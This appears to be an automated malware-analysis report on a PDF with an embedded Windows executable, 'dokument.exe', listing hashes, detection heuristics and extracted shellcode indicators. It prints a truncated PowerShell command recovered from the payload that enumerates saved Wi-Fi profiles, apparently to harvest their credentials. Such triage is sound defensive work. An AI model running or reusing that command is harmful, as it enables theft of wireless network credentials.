Malicious PDF — malware analysis report

Static analysis result for SHA-256 5cf7c0bc27180180…

MALICIOUS

PDF

514.9 KB Authoring application: pypdf First seen: 2026-06-11
MD5: 50a587ecfa7deae57fa8742b6f278376 SHA-1: 05ad199d0fdecf47228489495d7ef8cd470dee01 SHA-256: 5cf7c0bc2718018089c71dbca18e30cfde9e2a35bedfed04b80f72b58c658fc9
140 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.6145

Heuristics 4

  • Embedded Windows executable payload in PDF stream critical PDF_EMBEDDED_PE_PAYLOAD
    PDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://%255[^/]%2047s In PDF document text
    • https://%255[^/]%2047sIn PDF document text
    • https://cloudflare-dns.com/dns-query?name=%s&type=AIn PDF document text
    • https://api.ipify.orgIn PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
dokument.exe pdf-embedded-file PDF EmbeddedFile object 8 at offset 0x2F3 526005 bytes
SHA-256: 18feee5c259e1a5d2c2ff90e799bbd418817d57f5d047e0628419f1e5579c3e3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
actual_type=PE; declared_or_context_type=PDF; filename=dokument.exe; kind=pdf-embedded-file Static shellcode analysis found candidate code region(s). Indicators: NOP sled, SC_STR_POWERSHELL, SC_STR_VIRTUALPROTECT Static shellcode analysis recovered API/import strings: VirtualProtect, CreateProcessA, CreateFileA, CreateThread, InternetOpenA, InternetOpenUrlA Static shellcode analysis recovered command string(s): powershell -Command "netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $p=$_; netsh w

Open this report in the interactive analyzer, or submit your own file for analysis.